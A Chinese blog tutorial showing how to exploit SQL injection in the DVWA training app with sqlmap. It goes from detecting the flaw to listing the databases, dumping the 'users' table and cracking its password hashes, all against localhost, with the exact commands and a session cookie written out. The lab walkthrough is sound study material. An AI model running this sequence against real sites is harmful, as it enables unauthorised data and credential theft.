DVWA——Sqlmap练习
在DVWA页面中选择 SQL Injection
一、首先肯定是要判断是否有注入漏洞,在输入框输入1,返回
ID: 1
First name: admin
Surname: admin
返回正常;
再次输入1'
,报错,返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near " 1'
" at line 1
此时可以断定有SQL注入漏洞且为单引号闭合的字符型注入,下面利用SQLMap进行注入攻击。
二、利用Sqlmap工具:
1、先进行基本的测试
python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/index.php?id=1&Submit=Submit"
-u
参数表示url,指定连接目标
得到提示:
Sqlmap 得到302重定向到 " http://localhost:80/DVWA/login.php "。你想跟上吗?[y/n]
根据该提示,可以判断(302重定向)跳转至登录页面,看来需要带cookie,否则可能无法正常执行。
解释:web应用需要登录的时候需要加 cookie参数
不加则如下:
F12打开控制台,在网络里得到Cookie信息。
PHPSESSID "lqumo7do6sle0vl4gi7b9qqd57"
security "low"
加上带cookie参数再次测试:
python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=lqumo7do6sle0vl4gi7b9qqd57;sec
urity=low"
得到:
the back-end DBMS is MySQL //后台数据库管理系统:MySQL
web server operating system: Windows //Web服务武器操作系统:Windows
web application technology: PHP 5.4.45, Apache 2.4.23 //Web应用技术: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0 //后台数据库:MySQL
发现sqlmap可以跑出数据来了,构造其他语句,继续查取数据。
2、列出数据库信息:
python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=lqumo7do6sle0vl4gi7b9qqd57;s ecurity=low" --dbs
--dbs
表示列出目标有哪些数据库
得到8个mysql下数据库名:
3、获取当前的数据库:
python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=lqumo7do6sle0vl4gi7b9qqd57;security=low" --current-db
--current-db
得到当前使用的数据库
得到:current database: 'dvwa'
即:当前数据库名为:dvwa
4、获取当前数据库下的表:
python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=lqumo7do6sle0vl4gi7b9qqd57;security=low" --table -D "dvwa"
--table -D "xxx"
:得到xxx数据库下面的表
5、获取数据库dvwa下user表的字段:
python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=lqumo7do6sle0vl4gi7b9qqd57;security=low" --columns -T "users" -D "dvwa"
--columns -T "" -D ""
得到数据库下面的表下面的列(columns)
得到:
6、获取user表里的字段值:
python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=lqumo7do6sle0vl4gi7b9qqd57;security=low" --dump -T users -D dvwa
过程中会出现的部分提示信息:
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
您是否要将散列存储到临时文件中,以便最终使用其他工具进行进一步处理do you want to crack them via a dictionary-based attack? [Y/n/q]
您是否想通过基于字典的攻击来破解它们?what dictionary do you want to use?
用什么字典来破解?[1] default dictionary file 'C:\WangAn\Sqlmap\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
回车会直接使用第一个do you want to use common password suffixes? (slow!) [y/N]
您是否要使用通用密码后缀? (慢!)
最终得到:
至此,DVWA 的Low级别的SQL注入漏洞使用SqlMap工具注入完成。
DVWA——Sqlmap练习相关推荐
- 实验二、XSS和SQL注入
一. 实验目的 了解什么是XSS:了解XSS攻击实施,理解防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQL注入漏洞的基本方法 ...
- 网络渗透测试实验三 XSS和SQL
网络渗透测试实验三 XSS和SQL注入 实验目的:了解什么是XSS:思考防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQL注入漏 ...
- (超详细)XSS和SQL注入-网络渗透测试实验三
文章目录 前言 实验目的 系统环境 网络环境 实验工具 XSS部分:利用Beef劫持被攻击者客户端浏览器. 实验环境搭建. 环境搭建参考网站 搭建IIS时踩的坑: 1.利用AWVS扫描留言簿网站,发现 ...
- 实验三 XSS和SQL注入
实验三 XSS和SQL注入 实验目的:了解什么是XSS:了解XSS攻击实施,理解防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQ ...
- 网络渗透测试实验三——XSS和SQL注入
网络渗透测试实验三--XSS和SQL注入 实验目的 了解什么是XSS:了解XSS攻击实施,理解防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计 ...
- 使用SQLmap对dvwa进行SQL注入测试
SQLmap工具github链接:https://github.com/sqlmapproject/sqlmap 搭建dvwa环境并启动. windows上需要搭建Python环境,下载sqlmap包 ...
- 使用Sqlmap对dvwa进行sql注入测试(初级阶段)
0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和 ...
- 自学渗透测试:使用 DVWA 和 SQLmap 探寻 SQL 注入攻击与防范
数据来源 本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径.若观众因此作出任何危害网络安全的行为,后果自负,与本人无关. 01 耳熟能详的SQ注入是什么? 关于SQL注入漏洞,维基 ...
- DVWA——使用sqlmap工具post注入
目录 环境工具 攻击步骤 一.获取并保存数据包 二.sqlmap注入攻击 1.获取数据库信息 2.获取MySQL数据库中的表 3.获取user表中的字段 4.获取用户名和密码 总结 环境工具 PS:s ...
最新文章
- 吐血整理《计算机网络五层协议之物理层(中)》
- reportviewer控件mysql_reportviewer控件下载
- php与nginx整合
- JAVA基础系列:Arrays.sort()
- 使用Aop管理所有Valid结构bindingResult
- C#:JObject、JArray、JProperty、JValue作用
- Atitit 遍历文件夹目录解决方案与规范 attilax总结 1. 规范	2 1.1. 注意的不要同时改变文件夹内容,增删文件。这样获取到的目录list不会变化	2 1.2. 主义中文名称文件读写
- 火狐无法安装扩展_立即安装4个Firefox扩展
- Java 进制转换 代码
- Hibernate主键生成策略
- TX-LCN分布式事务
- Python 鸡肋面试题总结
- bcm5396交换机级联配置_工业以太网交换机的专业术语汇总
- excel表格横向纵向变换_WPS表格办公—返回Fisher变换值的FISHER函数
- Java菜鸟如何入门?1分钟入门
- 如何把python可视化到前端_Python一行代码搞定炫酷可视化,就用这个工具!
- yum不能使用了,怎么办?记下来!!!
- 腾讯编程比赛的试题,喜欢企鹅和编程的要进!
- 气象雷达在民航中的运用
- FFmpeg源码分析:视频滤镜介绍(上)